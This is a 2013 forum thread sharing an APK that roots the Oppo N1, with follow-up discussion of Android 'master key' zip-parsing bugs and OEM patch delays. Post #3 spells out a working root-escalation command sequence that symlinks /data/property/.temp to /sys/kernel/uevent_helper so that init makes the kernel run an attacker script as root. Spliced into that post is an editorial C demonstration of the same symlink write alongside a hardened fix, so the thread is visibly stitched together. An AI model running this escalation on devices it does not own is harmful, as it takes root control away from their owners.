APK root exploit

OP jcase

23rd November 2013, 07:25 PM   |  #1  
jcase's Avatar
OP Forum Moderator / Senior Recognized Developer - Taco Vendor
Flag Sequim WA
Thanks Meter: 8,309
 
3,946 posts
Join Date:Joined: Feb 2010
I tweeted this a couple of weeks ago, before the N1 was publicly out, but here you go: nothing fancy, no real UI or output.

Thanks to Saurik and Giantpune for contributing (i.e. it's based on their research).

Install the apk, run it, wait 1 minute, install the SuperSU app from the market, then uninstall the exploit with this command:

adb uninstall com.qualcomm.privinit
Attached file: Oppown-build3.apk (368.9 KB)
24th November 2013, 01:15 AM   |  #2  
Mr_Bartek
Do you have a link to their research or are their findings private?

Regards,
24th November 2013, 01:41 AM   |  #3  
jcase
Quote:
Originally Posted by Mr_Bartek

Do you have a link to their research or are their findings private?

Regards,

saurik - his analysis of the "second master key vuln"

giantpune for his symlink attack vuln in property space:

Code:
# Move the real property store aside and replace it with a directory the attacker controls
/system/bin/mv /data/property /data/backupprop
/system/bin/mkdir /data/property
# init writes persistent properties through /data/property/.temp; point that name at the kernel's uevent_helper
/system/bin/ln -s /sys/kernel/uevent_helper /data/property/.temp
# init (running as root) writes the value through the symlink, so the kernel runs /data/pwn.sh as root on the next uevent
/system/bin/setprop persist.sys.fail /data/pwn.sh
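As an added illustration of why the snippet above ends in root (this is example code written for this edit, not code from the thread, from giantpune, or from Android's init): init stores a persistent property by creating a temp file inside /data/property, writing the value, and renaming it into place. If the temp file name is opened by path, a planted symlink at that name redirects the root-privileged write. The C below rebuilds that sequence in a scratch directory under /tmp, with an ordinary file standing in for /sys/kernel/uevent_helper, first with a plain open() that follows the symlink and then with an O_EXCL|O_NOFOLLOW open() that refuses it. The function names, the ".temp" file name, the directory layout and the exact open flags are assumptions that approximate the pattern, not Android's actual source.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define PROP_VALUE "/data/pwn.sh"   /* the value handed to setprop in the post */

/* Assumed approximation of the vulnerable writer: create <dir>/.temp by path,
 * write the value, rename into place. open() follows symlinks, so a planted
 * <dir>/.temp symlink sends the write wherever the attacker chose. */
static int write_persistent_unsafe(const char *dir, const char *name, const char *value)
{
    char tmp[512], dst[512];
    snprintf(tmp, sizeof tmp, "%s/.temp", dir);
    snprintf(dst, sizeof dst, "%s/%s", dir, name);

    int fd = open(tmp, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0)
        return -1;
    ssize_t len = (ssize_t)strlen(value);
    int ok = write(fd, value, len) == len;
    close(fd);
    if (!ok)
        return -1;
    return rename(tmp, dst);   /* only moves the symlink; the damage is already done */
}

/* Hardened writer: O_NOFOLLOW rejects a symlink as the final path component and
 * O_EXCL rejects any pre-existing .temp (symlink or not). Either failure means
 * the directory was tampered with or an earlier write was interrupted; stop. */
static int write_persistent_safe(const char *dir, const char *name, const char *value)
{
    char tmp[512], dst[512];
    snprintf(tmp, sizeof tmp, "%s/.temp", dir);
    snprintf(dst, sizeof dst, "%s/%s", dir, name);

    int fd = open(tmp, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;                 /* EEXIST or ELOOP: refuse to write */
    ssize_t len = (ssize_t)strlen(value);
    int ok = write(fd, value, len) == len;
    close(fd);
    if (!ok) {
        unlink(tmp);
        return -1;
    }
    return rename(tmp, dst);
}

/* Rebuild the attack in a scratch directory: a regular file stands in for
 * /sys/kernel/uevent_helper and <propdir>/.temp is a symlink to it.
 * Returns 1 if the stand-in ends up containing PROP_VALUE (the privileged
 * writer followed the symlink), 0 if it was left untouched, -1 on setup error. */
int simulate_symlink_attack(int hardened)
{
    const char *base = getenv("TMPDIR");
    if (base == NULL)
        base = "/tmp";
    char root[512], victim[512], propdir[512], planted[512], renamed[512], buf[64] = {0};
    int result = -1, vf, rf;
    ssize_t n;

    snprintf(root, sizeof root, "%s/propdemo.XXXXXX", base);
    if (mkdtemp(root) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/uevent_helper", root);
    snprintf(propdir, sizeof propdir, "%s/property", root);
    snprintf(planted, sizeof planted, "%s/.temp", propdir);
    snprintf(renamed, sizeof renamed, "%s/persist.sys.fail", propdir);

    vf = open(victim, O_WRONLY | O_CREAT | O_TRUNC, 0600);   /* empty, like an unset uevent_helper */
    if (vf < 0)
        goto cleanup;
    close(vf);
    if (mkdir(propdir, 0700) < 0 || symlink(victim, planted) < 0)
        goto cleanup;

    if (hardened)
        write_persistent_safe(propdir, "persist.sys.fail", PROP_VALUE);
    else
        write_persistent_unsafe(propdir, "persist.sys.fail", PROP_VALUE);

    rf = open(victim, O_RDONLY);
    if (rf < 0)
        goto cleanup;
    n = read(rf, buf, sizeof buf - 1);
    close(rf);
    result = (n > 0 && strcmp(buf, PROP_VALUE) == 0) ? 1 : 0;

cleanup:
    unlink(planted);
    unlink(renamed);
    rmdir(propdir);
    unlink(victim);
    rmdir(root);
    return result;
}

int main(void)
{
    printf("plain open():             victim overwritten = %d\n", simulate_symlink_attack(0));
    printf("O_EXCL|O_NOFOLLOW open(): victim overwritten = %d\n", simulate_symlink_attack(1));
    return 0;
}
```

The first call reports 1 (the stand-in for uevent_helper now holds /data/pwn.sh, which on a real device is what the kernel would execute as root on the next uevent); the second reports 0 because open() fails with EEXIST before anything is written. A production fix would also verify with lstat()/fstat() that the property directory is a real directory owned by root with a restrictive mode, since the attacker here owns the directory itself, not just one entry in it.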
24th November 2013, 04:00 AM   |  #4  
coolrevi
Quote:
Originally Posted by jcase

I tweeted this a couple of weeks ago, before the N1 was publicly out, but here you go: nothing fancy, no real UI or output.

Thanks to Saurik and Giantpune for contributing (i.e. it's based on their research).

Install the apk, run it, wait 1 minute, install the SuperSU app from the market, then uninstall the exploit with this command:

adb uninstall com.qualcomm.privinit

Will this exploit work on any other device? When I try to install it, the Play Store warns about the vulnerability. Will this vulnerability be gone after uninstalling Oppown?
24th November 2013, 04:08 AM   |  #5  
jcase
Quote:
Originally Posted by coolrevi

Will this exploit work on any other device? When I try to install it, the Play Store warns about the vulnerability. Will this vulnerability be gone after uninstalling Oppown?

Possibly other Oppo devices.

No, it doesn't fix the vuln; just be careful where you install apps from.
24th November 2013, 11:27 AM   |  #6  
Ricky Divjakovski
Quote:
Originally Posted by jcase

Possibly other Oppo devices.

No, it doesn't fix the vuln; just be careful where you install apps from.

A second master key vulnerability? Hmm, so this might not be patched in 4.4?
Great job by the way. I don't have the device, but this is interesting!
24th November 2013, 12:40 PM   |  #7  
pulser_g2
Quote:
Originally Posted by ricky310711

A second master key vulnerability? Hmm, so this might not be patched in 4.4?
Great job by the way. I don't have the device, but this is interesting!

It should be patched in 4.4.

But some (read most) OEMs still can't manage to patch their devices up to the latest security updates on release.

Anyway, I tested this root method a week or so ago and it works nicely
24th November 2013, 01:02 PM   |  #8  
Ricky Divjakovski
Quote:
Originally Posted by pulser_g2

It should be patched in 4.4.

But some (read most) OEMs still can't manage to patch their devices up to the latest security updates on release.

Anyway, I tested this root method a week or so ago and it works nicely

So you're saying that on most devices the master key bug could still be a possible vulnerability on 4.3?

interesting...
24th November 2013, 06:17 PM   |  #9  
jcase
Quote:
Originally Posted by ricky310711

So you're saying that on most devices the master key bug could still be a possible vulnerability on 4.3?

interesting...

It depends on whether OEMs backported it, on which build the OEMs used, and on the bug. There are four or five different zip parser bugs with similar results. The one I used was patched in 4.3, but others exist.
1st January 2014, 03:22 AM   |  #10  
I'm trying to figure out why the Oppown apk will not install on my N1. Every time I try, it just says "app not installed". But on the install screen it says something about being an update to an already installed program. Any clues as to what the issue is? All I've done is update to the latest OTA software, and I'm currently located in Indonesia, if that makes a difference.
